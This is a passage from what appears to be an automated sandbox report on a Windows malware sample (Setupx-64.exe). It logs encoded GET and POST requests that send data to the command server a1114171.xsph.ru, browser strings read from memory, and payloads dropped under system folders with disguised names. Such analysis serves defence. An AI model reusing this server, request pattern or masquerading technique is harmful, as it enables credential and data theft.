JGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSzUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSx0kaNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
            Source: global trafficDNS traffic detected: DNS query: c.pki.goog
            Source: global trafficDNS traffic detected: DNS query: a1114171.xsph.ru
            Source: unknownHTTP traffic detected: POST /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundaryhZ5M9Wqw26useWavUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: a1114171.xsph.ruContent-Length: 86516Expect: 100-continue
            Source: upfc.exe, 00000014.00000002.2574244036.0000000005FEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1114171.xsph.ru
            Source: upfc.exe, 00000014.00000002.2574244036.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1114171.xsph.ru/
            Source: upfc.exe, 00000014.00000002.2574244036.0000000005A62000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005C0C000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005FEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1114171.xsph.ru/L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F
            Source: Blockruntime.exe, 00000004.00000002.1374284879.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000003221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: dCKtO8ZSpF.20.drString found in binary or memory: https://ac.ecosia.org?q=
            Source: dCKtO8ZSpF.20.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: yRR0zph3RQ.20.dr, xg2xptyHVW.20.dr, 3pfssK3piJ.20.dr, ibYMlyqdlJ.20.dr, bBVOYBzZwx.20.dr, cIp7ttgDWm.20.dr, 4Gb7WAGepy.20.dr, k50cFDBVKc.20.dr, 84fCPrW8Zi.20.dr, 8Epf4Xhy5g.20.dr, wufzSvjpkT.20.dr, dXnToyQeNf.20.dr, fg0zDcELdn.20.dr, UG8bRYt4XQ.20.dr, FCzPTnNqz8.20.dr, I3unsbEAtx.20.dr, Kxhm06oS6b.20.dr, K4jRSxy7EF.20.dr, fXj3UIHIii.20.dr, jYIhdvOxwI.20.dr, dCKtO8ZSpF.20.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: yRR0zph3RQ.20.dr, xg2xptyHVW.20.dr, 3pfssK3piJ.20.dr, ibYMlyqdlJ.20.dr, bBVOYBzZwx.20.dr, cIp7ttgDWm.20.dr, 4Gb7WAGepy.20.dr, k50cFDBVKc.20.dr, 84fCPrW8Zi.20.dr, 8Epf4Xhy5g.20.dr, wufzSvjpkT.20.dr, dXnToyQeNf.20.dr, fg0zDcELdn.20.dr, UG8bRYt4XQ.20.dr, FCzPTnNqz8.20.dr, I3unsbEAtx.20.dr, Kxhm06oS6b.20.dr, K4jRSxy7EF.20.dr, fXj3UIHIii.20.dr, jYIhdvOxwI.20.dr, dCKtO8ZSpF.20.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: dCKtO8ZSpF.20.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: yRR0zph3RQ.20.dr, xg2xptyHVW.20.dr, 3pfssK3piJ.20.dr, ibYMlyqdlJ.20.dr, bBVOYBzZwx.20.dr, cIp7ttgDWm.20.dr, 4Gb7WAGepy.20.dr, k50cFDBVKc.20.dr, 84fCPrW8Zi.20.dr, 8Epf4Xhy5g.20.dr, wufzSvjpkT.20.dr, dXnToyQeNf.20.dr, fg0zDcELdn.20.dr, UG8bRYt4XQ.20.dr, FCzPTnNqz8.20.dr, I3unsbEAtx.20.dr, Kxhm06oS6b.20.dr, K4jRSxy7EF.20.dr, fXj3UIHIii.20.dr, jYIhdvOxwI.20.dr, dCKtO8ZSpF.20.drString found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
            Source: dCKtO8ZSpF.20.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: dCKtO8ZSpF.20.drString found in binary or memory: https://gemini.google.com/app?q=
            Source: OqnhWfJNrM.20.drString found in binary or memory: https://support.mozilla.org
            Source: OqnhWfJNrM.20.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: upfc.exe, 00000014.00000002.2574244036.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005C26000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005A62000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005C0C000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D24000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
            Source: OqnhWfJNrM.20.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
            Source: yRR0zph3RQ.20.dr, xg2xptyHVW.20.dr, 3pfssK3piJ.20.dr, ibYMlyqdlJ.20.dr, bBVOYBzZwx.20.dr, cIp7ttgDWm.20.dr, 4Gb7WAGepy.20.dr, k50cFDBVKc.20.dr, 84fCPrW8Zi.20.dr, 8Epf4Xhy5g.20.dr, wufzSvjpkT.20.dr, dXnToyQeNf.20.dr, fg0zDcELdn.20.dr, UG8bRYt4XQ.20.dr, FCzPTnNqz8.20.dr, I3unsbEAtx.20.dr, Kxhm06oS6b.20.dr, K4jRSxy7EF.20.dr, fXj3UIHIii.20.dr, jYIhdvOxwI.20.dr, dCKtO8ZSpF.20.drString found in binary or memory: https://www.ecosia.org/newtab/v20
            Source: yRR0zph3RQ.20.dr, xg2xptyHVW.20.dr, 3pfssK3piJ.20.dr, ibYMlyqdlJ.20.dr, bBVOYBzZwx.20.dr, cIp7ttgDWm.20.dr, 4Gb7WAGepy.20.dr, k50cFDBVKc.20.dr, 84fCPrW8Zi.20.dr, 8Epf4Xhy5g.20.dr, wufzSvjpkT.20.dr, dXnToyQeNf.20.dr, fg0zDcELdn.20.dr, UG8bRYt4XQ.20.dr, FCzPTnNqz8.20.dr, I3unsbEAtx.20.dr, Kxhm06oS6b.20.dr, K4jRSxy7EF.20.dr, fXj3UIHIii.20.dr, jYIhdvOxwI.20.dr, dCKtO8ZSpF.20.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
            Source: OqnhWfJNrM.20.drString found in binary or memory: https://www.mozilla.org
            Source: upfc.exe, 00000014.00000002.2574244036.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005C26000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005C0C000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D24000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
            Source: OqnhWfJNrM.20.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
            Source: upfc.exe, 00000014.00000002.2574244036.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005C26000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005C0C000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D24000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
            Source: OqnhWfJNrM.20.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
            Source: upfc.exe, 00000014.00000002.2574244036.0000000005FFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/f
            Source: upfc.exe, 00000014.00000002.2574244036.0000000005D72000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005C26000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005C0C000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D24000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
            Source: upfc.exe, 00000014.00000002.2663108746.0000000013CFC000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2663108746.00000000136A6000.00000004.00000800.00020000.00000000.sdmp, 6vZy6GuGmM.20.dr, OqnhWfJNrM.20.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: upfc.exe, 00000014.00000002.2574244036.0000000005FFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/UC
            Source: upfc.exe, 00000014.00000002.2574244036.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005C26000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/p
            Source: OqnhWfJNrM.20.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: upfc.exe, 00000014.00000002.2574244036.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2663108746.0000000013CFC000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2663108746.00000000136A6000.00000004.00000800.00020000.00000000.sdmp, 6vZy6GuGmM.20.dr, OqnhWfJNrM.20.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
            Source: upfc.exe, 00000014.00000002.2574244036.0000000005FFB000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005C26000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005C0C000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D24000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2574244036.0000000005D2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
            Source: upfc.exe, 00000014.00000002.2663108746.0000000013CFC000.00000004.00000800.00020000.00000000.sdmp, upfc.exe, 00000014.00000002.2663108746.00000000136A6000.00000004.00000800.00020000.00000000.sdmp, 6vZy6GuGmM.20.dr, OqnhWfJNrM.20.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: C:\Program Files (x86)\Google\Update\upfc.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

            System Summary

            barindex
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Program Files (x86)\Google\Update\upfc.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008B718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_008B718C
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeFile created: C:\Windows\PolicyDefinitions\en-US\StartMenuExperienceHost.exeJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeFile created: C:\Windows\PolicyDefinitions\en-US\55b276f4edf653Jump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeFile created: C:\Windows\Speech\Engines\TTS\en-US\RuntimeBroker.exeJump to behavior
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeFile created: C:\Windows\Speech\Engines\TTS\en-US\9e8d7a4ca61bd9Jump to behavior
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008B857B0_2_008B857B
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008C70BF0_2_008C70BF
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008DD00E0_2_008DD00E
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008B407E0_2_008B407E
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008E11940_2_008E1194
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008B32810_2_008B3281
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008BE2A00_2_008BE2A0
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008D02F60_2_008D02F6
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008C66460_2_008C6646
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008C37C10_2_008C37C1
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008B27E80_2_008B27E8
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008D070E0_2_008D070E
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008D473A0_2_008D473A
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008BE8A00_2_008BE8A0
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008BF9680_2_008BF968
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008D49690_2_008D4969
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008C3A3C0_2_008C3A3C
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008C6A7B0_2_008C6A7B
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008D0B430_2_008D0B43
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008DCB600_2_008DCB60
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008C5C770_2_008C5C77
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008CFDFA0_2_008CFDFA
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008BED140_2_008BED14
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008C3D6D0_2_008C3D6D
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008BBE130_2_008BBE13
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008BDE6C0_2_008BDE6C
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008B5F3C0_2_008B5F3C
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: 0_2_008D0F780_2_008D0F78
            Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exeCode function: 4_2_00007FF7C81835854_2_00007FF7C8183585
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C817358520_2_00007FF7C8173585
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C818D1F820_2_00007FF7C818D1F8
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C83F334520_2_00007FF7C83F3345
            Source: C:\Program Files (x86)\Google\Update\upfc.exeCode function: 20_2_00007FF7C840EA6E20_2_00007FF7C840EA6E
            Source: C:\Recovery\fontdrvhost.exeCode function: 21_2_00007FF7C818358521_2_00007FF7C8183585
            Source: C:\Recovery\fontdrvhost.exeCode function: 22_2_00007FF7C818358522_2_00007FF7C8183585
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeCode function: 25_2_00007FF7C818358525_2_00007FF7C8183585
            Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exeCode function: 26_2_00007FF7C815358526_2_00007FF7C8153585
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: String function: 008CE28C appears 35 times
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: String function: 008CE360 appears 52 times
            Source: C:\Users\user\Desktop\Setupx-64.exeCode function: String function: 008CED00 appears 31 times
            Source: Blockruntime.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
